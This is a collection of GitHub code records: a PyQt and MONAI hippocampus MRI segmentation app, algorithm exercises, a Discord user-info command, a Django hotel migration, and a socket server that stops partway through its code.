+{"seq_id":"42081783568","text":"import sys\r\nimport os\r\nimport zipfile\r\nimport shutil\r\nimport nibabel as nib\r\nimport tarfile\r\nimport os\r\nfrom PIL import Image\r\nimport gzip\r\nimport dicom2nifti\r\nimport meshlib.mrmeshpy as mr\r\nimport meshlib.mrmeshnumpy as mrn\r\nimport cv2\r\nimport numpy as np\r\nimport scipy.signal\r\nimport torch\r\nimport monai\r\nfrom PyQt5 import uic, QtWidgets\r\nfrom PyQt5.QtWidgets import QFileDialog,QMainWindow\r\nfrom PyQt5.QtCore import Qt, QTimer\r\nfrom PyQt5 import QtGui\r\nfrom interfaz_acsi_choose import Ui_segunda_ventana\r\nfrom interfaz_acsi_info import Ui_tercera_ventana\r\nfrom PyQt5.uic import loadUi\r\n\r\nfrom datetime import datetime\r\nimport tempfile\r\nfrom glob import glob\r\nfrom torch.utils.data import random_split, DataLoader\r\nimport torchio as tio\r\nimport pytorch_lightning as pl\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\n# !pip install -q monai==1.1.0\r\n# !pip install -q torch==1.10.2 torchtext torchvision\r\n# !pip install -q torchio==0.18.73\r\n# !pip install -q pytorch-lightning==1.5.10\r\n# !pip install -q pandas==1.1.5 seaborn==0.11.1\r\n\r\n# Cargar la interfaz de usuario desde el archivo .ui\r\nqtCreatorFile = \"interfaz_acsi.ui\"\r\nUi_MainWindow, QtBaseClass = uic.loadUiType(qtCreatorFile)\r\n\r\nclass Model(pl.LightningModule):\r\n def __init__(self, net, criterion, learning_rate, optimizer_class):\r\n super().__init__()\r\n self.lr = learning_rate\r\n self.net = net\r\n self.criterion = criterion\r\n self.optimizer_class = optimizer_class\r\n \r\n def configure_optimizers(self):\r\n optimizer = self.optimizer_class(self.parameters(), lr=self.lr)\r\n return optimizer\r\n \r\n def prepare_batch(self, batch):\r\n return batch['image'][tio.DATA], batch['label'][tio.DATA]\r\n \r\n def infer_batch(self, batch):\r\n x, y = self.prepare_batch(batch)\r\n y_hat = self.net(x)\r\n return y_hat, y\r\n\r\n def training_step(self, batch, batch_idx):\r\n y_hat, y = self.infer_batch(batch)\r\n loss = self.criterion(y_hat, y)\r\n self.log('train_loss', loss, prog_bar=True)\r\n return loss\r\n \r\n def validation_step(self, batch, batch_idx):\r\n y_hat, y = self.infer_batch(batch)\r\n loss = self.criterion(y_hat, y)\r\n self.log('val_loss', loss)\r\n return loss\r\n \r\n def forward(self, x):\r\n # Pasar la entrada a través de la red\r\n return self.net(x)\r\n \r\nunet = monai.networks.nets.UNet(\r\n dimensions=3,\r\n in_channels=1,\r\n out_channels=3,\r\n channels=(8, 16, 32, 64),\r\n strides=(2, 2, 2),\r\n)\r\n\r\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\r\n\r\n# Define el modelo (asegúrate de que sea la misma arquitectura que se usó para entrenar)\r\nmodel = Model(\r\n net=unet,\r\n criterion=monai.losses.DiceCELoss(softmax=True),\r\n learning_rate=1e-2,\r\n optimizer_class=torch.optim.AdamW,\r\n)\r\n\r\n# Cargar los pesos del modelo\r\nmodel_path = 'model_weights.pth'\r\nmodel.load_state_dict(torch.load(model_path, map_location=torch.device('cpu')))\r\n\r\n# Poner el modelo en modo de evaluación\r\nmodel.eval()\r\n\r\n\r\nclass MyApp(QMainWindow, Ui_MainWindow):\r\n def __init__(self):\r\n super(MyApp, self).__init__()\r\n self.setupUi(self)\r\n self.setWindowTitle(\"Proyecto ACSI\")\r\n self.logo_upch.setPixmap(QtGui.QPixmap(\"upch_logo.png\"))\r\n self.logo_pucp.setPixmap(QtGui.QPixmap(\"pucp_logo.png\"))\r\n icon = QtGui.QIcon()\r\n icon.addPixmap(QtGui.QPixmap(\"upch_logo.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\r\n self.setFixedSize(705, 591)\r\n self.ventana_sec = 
Ventana_dos(parent=self)\r\n self.ventana_third = Ventana_tres(parent=self)\r\n # Conectar los botones a las funciones correspondientes\r\n self.load_file.activated.connect(self.agregar_carpeta)\r\n self.start_op.clicked.connect(self.inicio_tarea)\r\n self.save_file.clicked.connect(self.guardar_carpeta)\r\n self.timer = QTimer(self)\r\n self.timer.timeout.connect(self.play_next_image)\r\n \r\n self.next_both.clicked.connect(self.next_both_graphs)\r\n self.back_both.clicked.connect(self.back_both_graphs)\r\n self.stop_both.clicked.connect(self.stop_both_graphs)\r\n self.play_both.clicked.connect(self.play_both_graphs)\r\n self.choose.clicked.connect(self.choose_graph)\r\n self.button_info.clicked.connect(self.show_info)\r\n\r\n def show_info(self):\r\n try:\r\n self.ventana_third.show() \r\n except Exception as e:\r\n print(f\"Error: {e}\")\r\n\r\n def choose_graph(self):\r\n try:\r\n self.ventana_sec.show()\r\n except Exception as e:\r\n print(f\"Error: {e}\")\r\n\r\n def recibir_new_frame(self, new_i_frame):\r\n try:\r\n self.index_orig=new_i_frame\r\n self.graph_1.setPixmap(QtGui.QPixmap(str(self.rutas_frame_orig[new_i_frame])))\r\n self.graph_2.setPixmap(QtGui.QPixmap(str(self.rutas_frame_seg[new_i_frame])))\r\n self.t_frame.setText(str(new_i_frame))\r\n except Exception as e:\r\n print(f\"Error: {e}\")\r\n \r\n def play_both_graphs(self):\r\n if not self.rutas_frame_orig == [] and not self.rutas_frame_seg == []:\r\n self.index_orig = 0\r\n self.index_orig = 0\r\n self.timer.start(60) # Iniciar el QTimer para las imágenes originales\r\n\r\n def next_both_graphs(self):\r\n if not self.rutas_frame_orig == [] and not self.rutas_frame_seg == []:\r\n if self.index_orig < len(self.rutas_frame_orig) - 1:\r\n self.index_orig += 1\r\n self.graph_1.setPixmap(QtGui.QPixmap(str(self.rutas_frame_orig[self.index_orig])))\r\n self.t_frame.setText(str(self.index_orig))\r\n if self.index_orig < len(self.rutas_frame_seg) - 1:\r\n self.index_orig += 1\r\n self.graph_2.setPixmap(QtGui.QPixmap(str(self.rutas_frame_seg[self.index_orig])))\r\n self.t_frame.setText(str(self.index_orig))\r\n\r\n def back_both_graphs(self):\r\n if not self.rutas_frame_orig == [] and not self.rutas_frame_seg == []:\r\n if self.index_orig > 0:\r\n self.index_orig -= 1\r\n self.graph_1.setPixmap(QtGui.QPixmap(str(self.rutas_frame_orig[self.index_orig])))\r\n self.t_frame.setText(str(self.index_orig))\r\n if self.index_orig > 0:\r\n self.index_orig -= 1\r\n self.graph_2.setPixmap(QtGui.QPixmap(str(self.rutas_frame_seg[self.index_orig])))\r\n self.t_frame.setText(str(self.index_orig))\r\n\r\n\r\n def stop_both_graphs(self):\r\n try:\r\n self.timer.stop() # Detener el QTimer\r\n self.t_frame.setText(str(self.index_orig))\r\n except Exception as e:\r\n print(f\"Error: {e}\")\r\n\r\n def play_next_image(self):\r\n try:\r\n # Actualizar frames de la imagen original\r\n if self.index_orig < len(self.rutas_frame_orig):\r\n self.graph_1.setPixmap(QtGui.QPixmap(str(self.rutas_frame_orig[self.index_orig])))\r\n self.index_orig += 1\r\n else:\r\n self.index_orig = 0 # Reiniciar el índice si ha llegado al final\r\n\r\n # Actualizar frames de la imagen segmentada\r\n if self.index_orig < len(self.rutas_frame_seg):\r\n self.graph_2.setPixmap(QtGui.QPixmap(str(self.rutas_frame_seg[self.index_orig])))\r\n self.index_orig += 1\r\n else:\r\n self.index_orig = 0 # Reiniciar el índice si ha llegado al final\r\n\r\n self.t_frame.setText(str(self.index_orig)) # Actualizar el texto del frame\r\n\r\n except Exception as e:\r\n print(f\"Error: 
{e}\")\r\n\r\n \r\n def agregar_carpeta(self):\r\n try:\r\n texto=self.load_file.currentText()\r\n escritorio = os.path.expanduser(\"~/Desktop\")\r\n self.contenido_carpetas={}\r\n \r\n if texto == \"Cargar NIfTI\":\r\n archivo_nii_gz, _ = QFileDialog.getOpenFileName(self, \"Seleccionar Archivo NIfTI\", escritorio, filter=\"Archivos NIfTI (*.nii.gz)\")\r\n if not archivo_nii_gz:\r\n return # El usuario canceló la selección o no eligió un archivo NIfTI\r\n\r\n self.ruta_completa = archivo_nii_gz\r\n self.ruta_salida_nift = os.path.dirname(archivo_nii_gz)\r\n print(f\"Archivo seleccionado: {archivo_nii_gz}\")\r\n self.ruta_completa = archivo_nii_gz\r\n imagen_nii = nib.load(self.ruta_completa)\r\n self.datos = imagen_nii.get_fdata()\r\n print(self.datos.shape)\r\n self.flag_zip = 0\r\n self.mostrar_frames_graph_1(self.datos, self.flag_zip)\r\n\r\n # elif texto == \"Cargar archivo ZIP\":\r\n # archivo_zip, _ = QFileDialog.getOpenFileName(self, \"Seleccionar Archivo ZIP\", escritorio, filter=\"Archivos ZIP (*.zip)\")\r\n # self.flag_zip=1\r\n # if not archivo_zip:\r\n # return # El usuario canceló la selección o no eligió un archivo ZIP\r\n # # Abre el archivo ZIP en modo de lectura\r\n # self.directorio_destino = os.path.dirname(archivo_zip)\r\n # self.nombre_del_archivo = os.path.basename(archivo_zip)\r\n # new_archivo_zip, extension = os.path.splitext(archivo_zip)\r\n # if os.path.exists(new_archivo_zip):\r\n # # Si la carpeta existe, elimínala junto con su contenido\r\n # shutil.rmtree(new_archivo_zip)\r\n # os.mkdir(new_archivo_zip)\r\n # self.nombre_aux=os.path.basename(new_archivo_zip)\r\n # print(new_archivo_zip)\r\n # with zipfile.ZipFile(archivo_zip, 'r') as zip_ref:\r\n # zip_ref.extractall(new_archivo_zip)\r\n # print(f\"Se seleccionó una carpeta: {new_archivo_zip}\")\r\n # lista_de_archivos = zip_ref.namelist()\r\n # ruta_carpeta = os.path.join(new_archivo_zip, lista_de_archivos[0])\r\n # ruta_carpeta = ruta_carpeta.replace('\\\\', '/')\r\n # ruta_carpeta = ruta_carpeta[:-1]\r\n # print(f\"ruta:{ruta_carpeta}\")\r\n # self.nombre_aux=os.path.basename(ruta_carpeta)\r\n # print(f\"nombre_aux:{self.nombre_aux}\")\r\n # lista_de_archivos.pop(0)\r\n # print(f\"nombre: {lista_de_archivos}\")\r\n # self.ruta_salida_nift_1 = os.path.dirname(ruta_carpeta)\r\n # print(f\"ruta_salida_nift_1: {self.ruta_salida_nift_1}\") \r\n # self.ruta_salida_nift = os.path.join(self.ruta_salida_nift_1, str(self.nombre_aux)+str(\"_nii_gz\"))\r\n # self.ruta_salida_nift=self.ruta_salida_nift.replace('\\\\', '/')\r\n # print(self.ruta_salida_nift)\r\n # os.makedirs(self.ruta_salida_nift, exist_ok=True)\r\n # dicom2nifti.convert_directory(ruta_carpeta, self.ruta_salida_nift, compression=True, reorient=True)\r\n\r\n # nombre_archivo_generado = os.listdir(self.ruta_salida_nift)[0] # Suponiendo que solo haya un archivo\r\n # # Renombra el archivo generado a tu nombre personalizado\r\n # nombre_personalizado = str(self.nombre_aux)+str(\"_nii_gz.nii.gz\")\r\n # print(f\"nombre_f:{nombre_personalizado}\")\r\n # nueva_ruta_archivo = os.path.join(self.ruta_salida_nift, nombre_personalizado)\r\n # os.rename(os.path.join(self.ruta_salida_nift, nombre_archivo_generado), nueva_ruta_archivo)\r\n \r\n # archivo_ni_gz = os.listdir(self.ruta_salida_nift)\r\n # ruta_completa = os.path.join(self.ruta_salida_nift, archivo_ni_gz[0])\r\n # self.ruta_completa = ruta_completa.replace('\\\\', '/')\r\n # print(f\"Ruta_nift:{self.ruta_completa}\")\r\n # # Cargar el archivo NIfTI\r\n # imagen_nii = nib.load(self.ruta_completa)\r\n # # 
Acceder a los datos de la imagen (esto puede variar según tus necesidades)\r\n # self.datos = imagen_nii.get_fdata()\r\n # print(self.datos.shape)\r\n # self.mostrar_frames_graph_1(self.datos,self.flag_zip)\r\n\r\n elif texto == \"Cargar DICOM\":\r\n archivo_tar, _ = QFileDialog.getOpenFileName(self, \"Seleccionar Archivo TAR\", escritorio, filter=\"Archivos TAR (*.tar.gz *.tar)\")\r\n self.flag_zip=1\r\n if not archivo_tar:\r\n return # El usuario canceló la selección o no eligió un archivo ZIP\r\n # Abre el archivo TAR en modo de lectura\r\n self.directorio_destino = os.path.dirname(archivo_tar)\r\n self.nombre_del_archivo = os.path.basename(archivo_tar) \r\n archivo_tar, extension = os.path.splitext(archivo_tar)\r\n if os.path.exists(archivo_tar):\r\n # Si la carpeta existe, elimínala junto con su contenido\r\n shutil.rmtree(archivo_tar)\r\n os.mkdir(archivo_tar)\r\n self.nombre_aux=os.path.basename(archivo_tar)\r\n new_archivo_tar=os.path.join(self.directorio_destino, self.nombre_del_archivo)\r\n new_archivo_tar = new_archivo_tar.replace('\\\\', '/')\r\n \r\n shutil.unpack_archive(new_archivo_tar, extract_dir=archivo_tar)\r\n with tarfile.open(new_archivo_tar, 'r') as tar:\r\n # Obtiene la lista de nombres de archivos en el archivo tar\r\n lista_de_archivos = tar.getnames()\r\n print(f\"Se seleccionó una carpeta: {new_archivo_tar}\")\r\n ruta_carpeta = os.path.join(archivo_tar, lista_de_archivos[0])\r\n ruta_carpeta = ruta_carpeta.replace('\\\\', '/')\r\n print(f\"Ruta: {ruta_carpeta}\")\r\n lista_de_archivos.pop(0)\r\n print(f\"nombre: {lista_de_archivos}\")\r\n self.nombre_aux=os.path.basename(ruta_carpeta)\r\n self.ruta_salida_nift_1 = os.path.dirname(ruta_carpeta)\r\n self.ruta_salida_nift = os.path.join(self.ruta_salida_nift_1, str(self.nombre_aux)+str(\"_nii_gz\"))\r\n self.ruta_salida_nift=self.ruta_salida_nift.replace('\\\\', '/')\r\n print(self.ruta_salida_nift)\r\n os.makedirs(self.ruta_salida_nift, exist_ok=True)\r\n dicom2nifti.convert_directory(ruta_carpeta, self.ruta_salida_nift, compression=True, reorient=True)\r\n\r\n nombre_archivo_generado = os.listdir(self.ruta_salida_nift)[0] # Suponiendo que solo haya un archivo\r\n # Renombra el archivo generado a tu nombre personalizado\r\n nombre_personalizado = str(self.nombre_aux)+str(\"_nii_gz.nii.gz\")\r\n nueva_ruta_archivo = os.path.join(self.ruta_salida_nift, nombre_personalizado)\r\n os.rename(os.path.join(self.ruta_salida_nift, nombre_archivo_generado), nueva_ruta_archivo)\r\n\r\n archivo_ni_gz = os.listdir(self.ruta_salida_nift)\r\n ruta_completa = os.path.join(self.ruta_salida_nift, archivo_ni_gz[0])\r\n self.ruta_completa = ruta_completa.replace('\\\\', '/')\r\n print(f\"Ruta_nift:{self.ruta_completa}\")\r\n # Cargar el archivo NIfTI\r\n imagen_nii = nib.load(self.ruta_completa)\r\n # Acceder a los datos de la imagen (esto puede variar según tus necesidades)\r\n self.datos = imagen_nii.get_fdata()\r\n print(self.datos.shape)\r\n self.mostrar_frames_graph_1(self.datos,self.flag_zip)\r\n except Exception as e:\r\n print(f\"Error al mostrar las imágenes: {e}\") \r\n \r\n def mostrar_frames_graph_1(self, contenido_carpetas, flag_zip):\r\n try:\r\n ########Colocar el procesamiento para obtener frames en 2D########\r\n self.images_orig=contenido_carpetas\r\n # Crear una lista para almacenar las rutas\r\n self.rutas_frame_orig = []\r\n self.index_orig=0\r\n self.ruta_slices = os.path.join(os.path.dirname(self.ruta_salida_nift), \"aux_slices\")\r\n self.ruta_slices = self.ruta_slices.replace('\\\\', '/')\r\n 
print(f\"dir_ruta_slices:{self.ruta_slices}\")\r\n os.makedirs(self.ruta_slices, exist_ok=True)\r\n for i, imagen_2d in enumerate(contenido_carpetas[1,1,:]):\r\n # Convierte la imagen 2D en formato CV_8U (8 bits sin signo) para OpenCV\r\n imagen_2d = np.uint8(contenido_carpetas[:,:,i])\r\n # Define el nombre del archivo de imagen\r\n nombre_archivo = f\"imagen_{i}.png\"\r\n # Ruta completa del archivo de imagen\r\n ruta_archivo = os.path.join(self.ruta_slices, nombre_archivo)\r\n # Guarda la imagen como archivo\r\n cv2.imwrite(ruta_archivo, imagen_2d)\r\n # Agrega la ruta del archivo a la lista\r\n self.rutas_frame_orig.append(ruta_archivo)\r\n print(i)\r\n print(f\"Se han guardado {len(self.rutas_frame_orig)} imágenes en {self.ruta_slices}\")\r\n self.graph_1.setPixmap(QtGui.QPixmap(str(self.rutas_frame_orig[self.index_orig])))\r\n self.t_frame.setText(str(self.index_orig))\r\n except Exception as e:\r\n print(f\"Error al mostrar las imágenes: {e}\")\r\n\r\n def inicio_tarea(self):\r\n try:\r\n print(\"Iniciando segmentación...\")\r\n self.segmentacion()\r\n self.mostrar_frames_graph_2()\r\n except Exception as e:\r\n print(f\"Error en inicio_tarea: {e}\")\r\n\r\n \r\n def get_preprocessing_transform(self):\r\n return tio.Compose([\r\n tio.RescaleIntensity((-1, 1)), # Reemplaza target_size con el tamaño deseado\r\n tio.EnsureShapeMultiple(8), # Para U-Net\r\n tio.OneHot(),\r\n ])\r\n def convertir_a_stl(self, mask_array, predictions_folder):\r\n # Debes asegurarte de que 'mask_array' es una matriz 3D que representa tu segmentación\r\n # Si 'mask_array' no es 3D, necesitarás ajustarlo\r\n\r\n # Convertir la matriz 3D a SimpleVolume\r\n simpleVolume = mrn.simpleVolumeFrom3Darray(mask_array.astype(float))\r\n\r\n # Convertir SimpleVolume a FloatGrid\r\n floatGrid = mr.simpleVolumeToDenseGrid(simpleVolume)\r\n\r\n # Crear malla usando un iso-valor y el tamaño de voxel\r\n mesh = mr.gridToMesh(floatGrid, mr.Vector3f(0.1, 0.1, 0.1), 0.5)\r\n\r\n # Guardar la malla como STL\r\n stl_path = os.path.join(predictions_folder, 'mesh.stl')\r\n mr.saveMesh(mesh, stl_path)\r\n \r\n def segmentacion(self):\r\n try:\r\n subject = tio.Subject(image=tio.ScalarImage(self.ruta_completa))\r\n preprocess = self.get_preprocessing_transform()\r\n preprocessed_subject = preprocess(subject)\r\n\r\n predictions_folder = 'predictions'\r\n if not os.path.exists(predictions_folder):\r\n os.makedirs(predictions_folder)\r\n\r\n with torch.no_grad():\r\n input_tensor = preprocessed_subject['image'][tio.DATA][None]\r\n input_tensor = input_tensor.to(device)\r\n output = model(input_tensor)\r\n output_label = output.argmax(dim=1, keepdim=True).cpu()\r\n output_label_squeezed = output_label.squeeze(0)\r\n\r\n mask_array = output_label.numpy().squeeze()\r\n mask_array = (mask_array * 255).astype(np.uint8)\r\n\r\n # Guardar cada corte del volumen como PNG y la lista de rutas\r\n self.mascaras_obtenidas = []\r\n for i, slice in enumerate(mask_array):\r\n slice_image = Image.fromarray(slice)\r\n slice_path = os.path.join(predictions_folder, f'mask_slice_{i}.png')\r\n slice_image.save(slice_path)\r\n self.mascaras_obtenidas.append(slice_path)\r\n\r\n # Guardar la segmentación completa como archivo NIfTI\r\n nifti_path = os.path.join(predictions_folder, 'segmentacion_completa.nii.gz')\r\n segmented_image = tio.ScalarImage(tensor=output_label_squeezed)\r\n segmented_image.save(nifti_path)\r\n\r\n # Calcular el volumen\r\n # Asumiendo que cada voxel es 1x1x1 mm^3, pero verifica esto con tus datos\r\n volumen = 
np.sum(segmented_image.numpy() > 0) # Cuenta los voxels en la ROI\r\n self.t_vol_h.setText(str(volumen)+\"mm3\") # Muestra el volumen calculado\r\n self.convertir_a_stl(mask_array, predictions_folder)\r\n\r\n print(\"Segmentación completada y máscaras guardadas.\")\r\n except Exception as e:\r\n print(f\"Error en la segmentación: {e}\")\r\n\r\n \r\n def mostrar_frames_graph_2(self):\r\n try:\r\n self.rutas_frame_seg = self.mascaras_obtenidas\r\n self.index_orig = 0\r\n\r\n if self.rutas_frame_seg:\r\n self.graph_2.setPixmap(QtGui.QPixmap(str(self.rutas_frame_seg[self.index_orig])))\r\n self.t_frame.setText(str(self.index_orig))\r\n else:\r\n print(\"No hay máscaras para mostrar.\")\r\n except Exception as e:\r\n print(f\"Error al mostrar las imágenes segmentadas: {e}\")\r\n\r\n\r\n def guardar_carpeta(self):\r\n options = QFileDialog.Options()\r\n options |= QFileDialog.DontUseNativeDialog\r\n escritorio = os.path.expanduser(\"~/Desktop\")\r\n carpeta_seleccionada = QFileDialog.getExistingDirectory(self, \"Guardar Carpeta...\", escritorio, options=options)\r\n\r\n if carpeta_seleccionada:\r\n try:\r\n carpeta_origen = self.ruta_nueva\r\n carpeta_destino = os.path.join(carpeta_seleccionada, self.nombre_aux+\"_result\")\r\n\r\n if os.path.exists(carpeta_destino):\r\n contador = 1\r\n while True:\r\n nuevo_nombre = f\"{self.nombre_aux} ({contador})\"+\"_result\"\r\n carpeta_destino = os.path.join(carpeta_seleccionada, nuevo_nombre)\r\n if not os.path.exists(carpeta_destino):\r\n break\r\n contador += 1\r\n\r\n shutil.copytree(carpeta_origen, carpeta_destino)\r\n print(\"Carpeta de destino:\", carpeta_destino)\r\n print(\"Guardado con éxito\")\r\n except FileNotFoundError as e:\r\n print(\"Error: La carpeta de origen no se encuentra.\")\r\n except PermissionError as e:\r\n print(\"Error: No tienes permisos para copiar la carpeta.\")\r\n except Exception as e:\r\n print(f\"Error al copiar la carpeta: {e}\")\r\n\r\n def closeEvent(self, event):\r\n confirmacion = QtWidgets.QMessageBox.question(self, \"Confirmar Salida\", \"¿Estás seguro de que deseas salir?\",\r\n QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)\r\n if confirmacion == QtWidgets.QMessageBox.Yes:\r\n event.accept()\r\n else:\r\n event.ignore()\r\n\r\nclass Ventana_dos(QMainWindow):\r\n def __init__(self, parent=None):\r\n super(Ventana_dos, self).__init__(parent)\r\n loadUi(\"interfaz_acsi_choose.ui\", self)\r\n self.acept_f.clicked.connect(self.close_segunda_ventana)\r\n self.setWindowTitle(\"Proyecto ACSI\")\r\n self.setFixedSize(234, 84)\r\n\r\n def close_segunda_ventana(self):\r\n try:\r\n new_i_frame = int(self.c_frame.toPlainText())\r\n print(\"Valor de c_frame:\", new_i_frame)\r\n self.parent().recibir_new_frame(new_i_frame)\r\n self.close()\r\n except Exception as e:\r\n print(f\"Error: {e}\")\r\n\r\nclass Ventana_tres(QMainWindow):\r\n def __init__(self, parent=None):\r\n super(Ventana_tres, self).__init__(parent)\r\n loadUi(\"interfaz_acsi_info.ui\", self)\r\n self.setWindowTitle(\"Proyecto ACSI\")\r\n self.setFixedSize(527, 306)\r\n\r\nif __name__ == \"__main__\":\r\n app = QtWidgets.QApplication(sys.argv)\r\n window = MyApp()\r\n window.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"cpariona/Hippocampus-3D-Segmentation","sub_path":"codigo_fuente/code_function_acsi.py","file_name":"code_function_acsi.py","file_ext":"py","file_size_in_byte":24945,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"10285886636","text":"# BOJ 10989 Sort 3 -Counting Sort\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\ndic = dict()\nfor _ in range(n):\n x = int(input())\n if x in dic:\n dic[x] += 1\n else :\n dic[x] = 1\nfor key,count in sorted(dic.items()):\n for _ in range(count):\n print(key)","repo_name":"Qud4300/Baekjoon_Online_Judge","sub_path":"10989 수 정렬하기 3/sort3.py","file_name":"sort3.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"31900442828","text":"#your usual imports and then this code\r\n\r\n@client.command()\r\nasync def user(ctx, member:discord.Member=None):\r\n if member is None:\r\n member = ctx.message.author\r\n pronoun = \"Your\"\r\n else:\r\n pronoun = str(member)\r\n name = f\"{member.name}#{member.discriminator}\"\r\n status = ctx.author.status.name\r\n created_on = member.created_at.__format__('%A, %d. %B %Y @ %H:%M:%S')\r\n userAvatarUrl = member.avatar_url\r\n join = member.joined_at.__format__('%A, %d. %B %Y @ %H:%M:%S')\r\n statoos = member.activity\r\n house = member.top_role\r\n permissions = member.permissions_in(ctx.message.channel)\r\n #userhighest role\r\n await ctx.send(\"``` ```\")\r\n await ctx.send(f\"\"\"**`Here's Some Dirt On:` {member.mention}!:\r\nUsername is: `{str(member.name)}`\r\nUserTag is: `{str(member.discriminator)}`\r\nUser ID is: `{str(member.id)}`\r\nUser Presence is: `{str(status)}`\r\nUser Is Playing: `{str(statoos)}`\r\nUser Highest Role: `{str(house)}`\r\nUser Created On: `{str(created_on)}`\r\nUser Joined On: `{str(join)}`\r\nUser Permissions: `{str(permissions)}`**\"\"\")\r\n await ctx.send(userAvatarUrl)\r\n await ctx.send(\"``` ```\")","repo_name":"Javi-beep/discord-bot-commands","sub_path":"info kinda commands/userstats.py","file_name":"userstats.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"10599408914","text":"import sys\nimport heapq as hq\ninput = sys.stdin.readline\n\ndef dijkstra(start):\n q = []\n distance = [INF] * (n+1)\n \n hq.heappush(q, (0, start))\n distance[start] = 0\n while q:\n dist, now = hq.heappop(q)\n if distance[now] < dist: continue # 이미 갱신됨\n for cost, next in graph[now]:\n tmp = dist + cost\n if distance[next] > tmp:\n distance[next] = tmp\n hq.heappush(q, (tmp, next))\n \n return distance\n\ndef calculate_infection():\n count, time = 0, 0\n distance = dijkstra(c)\n for d in distance:\n if d < INF:\n count +=1\n time = max(time, d)\n return count, time \n\nif __name__ == \"__main__\":\n INF = int(1e9)\n t = int(input())\n for _ in range(t):\n n, d, c = map(int, input().split())\n\n # 의존성\n graph = [[] for _ in range(n+1)]\n for _ in range(d):\n a, b, s = map(int, input().split())\n graph[b].append((s, a))\n \n print(\" \".join(map(str, calculate_infection())))\n ","repo_name":"Altu-Bitu-2/Altu-Bitu-Algorithms-Study","sub_path":"[최단 경로] 5월 3일/B10282.py","file_name":"B10282.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"14642763966","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('place', '0006_auto_20171231_1554'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Hotel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('country_id', models.IntegerField(default=-1, verbose_name='\\u6240\\u5c5e\\u56fd\\u5bb6id')),\n ('province_id', models.IntegerField(default=-1, verbose_name='\\u6240\\u5c5e\\u7701\\u4efdid')),\n ('city_id', models.IntegerField(default=-1, verbose_name='\\u6240\\u5c5e\\u57ce\\u5e02id')),\n ('district_id', models.IntegerField(default=-1, verbose_name='\\u6240\\u5c5e\\u884c\\u653f\\u533aid')),\n ('name', models.CharField(default=b'', max_length=200, verbose_name='\\u9152\\u5e97\\u540d\\u79f0')),\n ('en_name', models.CharField(default=b'', max_length=200, verbose_name='\\u9152\\u5e97\\u82f1\\u6587\\u540d\\u79f0')),\n ('addr', models.CharField(default=b'', max_length=200, verbose_name='\\u9152\\u5e97\\u5730\\u5740')),\n ('price', models.DecimalField(default=0.0, max_digits=16, decimal_places=8)),\n ('lng', models.DecimalField(default=0.0, max_digits=16, decimal_places=8)),\n ('lat', models.DecimalField(default=0.0, max_digits=16, decimal_places=8)),\n ('cmt_num', models.IntegerField(default=-1, verbose_name='\\u8bc4\\u8bba\\u6570\\u76ee')),\n ('pts', models.DecimalField(default=0.0, verbose_name='\\u8bc4\\u5206', max_digits=16, decimal_places=8)),\n ('pts_level', models.CharField(default=b'', max_length=200, verbose_name='\\u8bc4\\u5206\\u7b49\\u7ea7')),\n ('note_num', models.IntegerField(default=-1, verbose_name='\\u6e38\\u8bb0\\u6570\\u76ee')),\n ('desc', models.CharField(default=b'', max_length=200, verbose_name='\\u63cf\\u8ff0')),\n ('main_pic', models.CharField(default=b'', max_length=200, verbose_name='\\u9152\\u5e97\\u4e3b\\u56fe')),\n ('url', models.CharField(default=b'', max_length=200, null=True, verbose_name='url\\u94fe\\u63a5')),\n ('status', models.IntegerField(default=-1, verbose_name='\\u9152\\u5e97\\u72b6\\u6001')),\n ('created', models.DateTimeField(auto_now_add=True, null=True)),\n ('updated', models.DateTimeField(auto_now=True, null=True)),\n ],\n ),\n ]\n","repo_name":"Cribbee/gofree130","sub_path":"place/migrations/0007_hotel.py","file_name":"0007_hotel.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"14493584633","text":"#!/usr/bin/env python3\r\n\r\nimport socket\r\nimport os, sys, json\r\nimport signal\r\nfrom subprocess import Popen, PIPE\r\n\r\nPORT = 65432 # Port to listen on (non-privileged ports are > 1023)\r\nHOST = '127.0.0.1' # Standard loopback interface address (localhost)\r\nHOST = socket.gethostname()\r\n\r\n#To run and survive closing terminal: nohup python socket-server.py\r\n#To run periodically - chrontab -e: \r\n# 00 * * * * python /var/www/html/projects/asly/socket-server.py\r\n\r\n\r\ndef kill_port_proc(port_num):\r\n process = Popen([\"lsof\", \"-i\", \":{0}\".format(port_num)], stdout=PIPE, stderr=PIPE)\r\n stdout, stderr = process.communicate()\r\n for process in str(stdout.decode(\"utf-8\")).split(\"\\n\")[1:]: \r\n data = [x for x in process.split(\" \") if x != '']\r\n if (len(data) <= 1):\r\n continue\r\n\r\n os.kill(int(data[1]), signal.SIGKILL)\r\n print(\"Killed process, please run the script again\")\r\n\r\n#Now for the application specific part, functions, libraries, and data to load\r\n#Application specific libraries\r\n# sys.path.append(\"/var/www/html/code_utils\")\r\n# from parsing_lib import *\r\n\r\n#shelve_fpath=\"parsing/verbs.shelve\"\r\n\r\n#identify the data processing function for each application\r\ndef process_data(data0):\r\n data0_decoded=data.decode(\"utf-8\")\r\n data0_decoded='Test: %s'%data0_decoded\r\n output0=data0_decoded.encode(\"utf-8\")\r\n return output0\r\n\r\n\r\n\r\ntry:\r\n while True:\r\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\r\n s.bind((HOST, PORT))\r\n s.listen()\r\n conn, 